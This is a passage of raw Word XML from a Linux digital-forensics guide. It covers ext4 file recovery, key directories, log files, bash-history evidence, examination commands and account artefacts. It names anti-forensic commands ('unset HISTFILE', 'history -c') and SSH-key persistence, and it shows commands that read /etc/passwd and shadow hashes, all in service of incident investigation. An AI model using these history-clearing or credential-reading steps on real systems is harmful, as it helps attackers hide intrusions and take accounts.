                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">stat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">debugfs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deleted-file recovery on ext3/ext4 is generally </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">harder than on NTFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, because on deletion the inode’s block pointers are cleared and the inode is marked free. The data blocks themselves stay until overwritten, so carving (PhotoRec, Scalpel) and journal analysis (debugfs, extundelete) may recover content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key directories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Directory</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 it matters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/var/log</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 authentication, application and web-server logs — the main source of evidence</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/etc</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 configuration: users (passwd, shadow, group), sudoers, cron configuration, services, network settings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/home/&lt;user&gt;</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files and hidden files: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.bash_history</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.ssh/</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.bashrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, browser profiles, desktop files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/root</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Home directory of the root user — history and files of administrator activity</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/tmp, /var/tmp, /dev/shm</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Temporary files, writable by everyone. Attackers often drop tools and scripts here; /tmp and /dev/shm may be cleared on reboot</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/proc, /sys</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Virtual file systems that exist in memory — a live view of processes and kernel data (only on a running system)</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/var/spool/cron</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crontab files (scheduled jobs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical log files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216"/>
        <w:gridCol w:w="6530"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="321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Log / file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="653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Contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>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/var/log/auth.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Debian/Ubuntu) or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/var/log/secure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (RHEL/CentOS)</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Authentication: SSH logins (accepted and failed), sudo usage, user and password changes, su</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>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/var/log/syslog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/var/log/messages</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General system messages from services and programs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>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/var/log/kern.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, dmesg</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Kernel messages, hardware and USB device connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>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/var/log/wtmp</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btmp</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lastlog</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Binary records of successful logins, failed logins and last login per user. Read with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">last</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lastb</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lastlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>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/var/log/apache2/access.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, error.log (or nginx)</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Every web request: client IP, time, URL, status — reveals web attacks such as SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="321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journalctl (systemd journal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="653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Combined logs on newer systems, read with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">journalctl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>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~/.bash_history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="653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Commands typed in Bash by that user (written when the shell exits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is very valuable: it can show downloads (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</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curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), privilege changes, file copying (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), and deleted logs. But it is easy to disable (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unset HISTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) or delete (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">history -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, removing the file). Missing history does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> prove no commands were run — and history lacks reliable timestamps unless </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HISTTIMEFORMAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">log gaps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or truncated logs, a sign of log tampering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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Useful Linux examination commands</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">last ; lastb ; lastlog          # login history, failed logins</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">grep 'Failed password' /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/passwd                  # all accounts (look for extra UID 0 accounts)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la /home/*/.ssh/             # SSH keys, authorized_keys</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">stat suspicious_file             # atime, mtime, ctime, inode</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /proc/net/tcp ; ss -tunap    # network connections (live system)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">User account artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — one line per account: username, UID, GID, home directory and login shell. Any user other than </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UID 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — stores password hashes (readable only by root). A hash starting with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$6$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is SHA-512, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$5$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA-256, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$1$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MD5, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$y$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> yescrypt. Account password-change and expiry data are also stored here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/group and /etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — group membership and who may use sudo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — attackers add their public key here for permanent access; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">known_hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lists machines the user connected to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
